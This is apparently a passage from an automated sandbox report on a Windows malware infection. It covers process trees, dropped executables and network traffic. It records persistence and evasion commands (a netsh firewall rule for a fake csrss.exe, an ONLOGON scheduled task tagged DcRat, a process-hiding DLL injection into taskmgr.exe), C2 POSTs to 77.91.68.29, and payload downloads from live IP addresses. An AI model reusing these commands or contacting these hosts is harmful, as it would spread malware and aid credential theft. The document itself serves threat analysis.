  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:1592
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffdca4446f8,0x7ffdca444708,0x7ffdca444718
    3⤵
    PID:4712
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,3332460332409941154,17905929674530609915,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
    3⤵
    PID:3792
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,3332460332409941154,17905929674530609915,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8
    3⤵
    PID:4716
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,3332460332409941154,17905929674530609915,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
    3⤵
    PID:672
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,3332460332409941154,17905929674530609915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
    3⤵
    PID:1212
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,3332460332409941154,17905929674530609915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
    3⤵
    PID:4508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:232
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdca4446f8,0x7ffdca444708,0x7ffdca444718
    3⤵
    PID:1460
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,16335376246053593679,8191855627600006209,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3460
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,16335376246053593679,8191855627600006209,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
    3⤵
    PID:3380
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,16335376246053593679,8191855627600006209,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2948 /prefetch:8
    3⤵
    PID:3016
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16335376246053593679,8191855627600006209,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1
    3⤵
    PID:4736
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16335376246053593679,8191855627600006209,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
    3⤵
    PID:2148
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16335376246053593679,8191855627600006209,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
    3⤵
    PID:3644
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16335376246053593679,8191855627600006209,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
    3⤵
    PID:2728
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,16335376246053593679,8191855627600006209,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5744 /prefetch:8
    3⤵
    PID:2188
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,16335376246053593679,8191855627600006209,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5744 /prefetch:8
    3⤵
    PID:852
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16335376246053593679,8191855627600006209,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3960 /prefetch:1
    3⤵
    PID:1600
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16335376246053593679,8191855627600006209,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:1
    3⤵
    PID:424

C:\Users\Admin\AppData\Local\Temp\DD4F.exe
C:\Users\Admin\AppData\Local\Temp\DD4F.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4064
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2172

C:\Users\Admin\AppData\Local\Temp\F3C6.exe
C:\Users\Admin\AppData\Local\Temp\F3C6.exe
1⤵
- Executes dropped EXE
PID:5000
- C:\Users\Admin\AppData\Local\Temp\ss41.exe
  "C:\Users\Admin\AppData\Local\Temp\ss41.exe"
  2⤵
  - Executes dropped EXE
  PID:2696
- C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
  "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3172
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:4180
- C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
  "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4992
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1220
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:2992
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Modifies data under HKEY_USERS
      PID:4116
  - - C:\Windows\system32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      4⤵
      PID:4920
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:4564
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:4940
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:3820
  - - C:\Windows\rss\csrss.exe
      C:\Windows\rss\csrss.exe
      4⤵
      PID:4604
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4976
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        DcRat
        Creates scheduled task(s)
        
        PID:4160
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        5⤵
        
        PID:3376
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:3968
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:1860
    - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        5⤵
        
        PID:3704

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3772

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4432

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2360

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1436

Network

DNS

17.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.160.190.20.in-addr.arpa

IN PTR

Response
DNS

1.208.79.178.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.208.79.178.in-addr.arpa

IN PTR

Response

1.208.79.178.in-addr.arpa

IN PTR

https-178-79-208-1amsllnwnet
DNS

26.35.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.35.223.20.in-addr.arpa

IN PTR

Response
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://tuctckvc.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 114
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 12:16:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 7
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://welthibfb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 264
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 12:16:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 49
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

29.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.68.91.77.in-addr.arpa

IN PTR

Response

29.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
DNS

26.165.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.165.165.52.in-addr.arpa

IN PTR

Response
DNS

198.187.3.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.187.3.20.in-addr.arpa

IN PTR

Response
DNS

1.202.248.87.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.202.248.87.in-addr.arpa

IN PTR

Response

1.202.248.87.in-addr.arpa

IN PTR

https-87-248-202-1amsllnwnet
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://njlxmvh.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 186
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 12:16:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

254.211.247.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

254.211.247.8.in-addr.arpa

IN PTR

Response
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ccwgud.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 299
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 12:17:06 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://guxpjttnv.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 179
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 12:17:06 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xxumxjuee.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 157
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 12:17:06 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 54
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rmoexwdtc.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 223
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 12:17:06 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://mboqgotm.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 138
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 12:17:06 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xshgyo.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 206
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 12:17:06 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hcxcywwxvq.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 248
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 12:17:07 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dwnjvhlf.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 166
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 12:17:07 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 41
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wxwbocrqqr.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 279
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 12:17:07 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gpgisg.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 298
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 12:17:07 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 49
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://uabpfkiye.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 212
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 12:17:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bjjoovwigg.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 342
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 12:17:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 40
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
GET

http://77.91.68.78/lend/build.exe

Remote address:

77.91.68.78:80

Request

GET /lend/build.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.78

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 12:17:06 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sun, 10 Sep 2023 15:00:11 GMT
ETag: "55600-6050277656643"
Accept-Ranges: bytes
Content-Length: 349696
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET

http://77.91.68.78/lend/deluxe_crypted.exe

Remote address:

77.91.68.78:80

Request

GET /lend/deluxe_crypted.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.78

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 12:17:06 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 14 Sep 2023 17:48:32 GMT
ETag: "67140-6055548cdb22d"
Accept-Ranges: bytes
Content-Length: 422208
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET

http://77.91.68.78/lend/crypt1234.exe

Remote address:

77.91.68.78:80

Request

GET /lend/crypt1234.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.78

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 12:17:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 18 Sep 2023 02:59:24 GMT
ETag: "e0000-605995469c918"
Accept-Ranges: bytes
Content-Length: 917504
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

78.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

78.68.91.77.in-addr.arpa

IN PTR

Response

78.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
GET

http://77.91.68.61/fuza/sunor.exe

Remote address:

77.91.68.61:80

Request

GET /fuza/sunor.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.61

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 12:17:06 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 18 Sep 2023 11:58:59 GMT
ETag: "19c9e7-605a0de13a6c0"
Accept-Ranges: bytes
Content-Length: 1690087
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET

http://77.91.68.61/fuza/2.bat

Remote address:

77.91.68.61:80

Request

GET /fuza/2.bat HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.61

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 12:17:07 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 16 Sep 2023 19:17:49 GMT
ETag: "4f-6057ec3d4c0b6"
Accept-Ranges: bytes
Content-Length: 79
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

61.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

61.68.91.77.in-addr.arpa

IN PTR

Response

61.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
GET

http://5.42.65.80/rockss.exe

Remote address:

5.42.65.80:80

Request

GET /rockss.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 5.42.65.80

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 18 Sep 2023 12:17:09 GMT
Content-Type: application/octet-stream
Content-Length: 4865024
Last-Modified: Sun, 17 Sep 2023 18:20:21 GMT
Connection: keep-alive
ETag: "65074365-4a3c00"
Accept-Ranges: bytes
DNS

80.65.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.65.42.5.in-addr.arpa

IN PTR

Response
DNS

91.179.33.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

91.179.33.162.in-addr.arpa

IN PTR

Response
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gduoatuv.com/
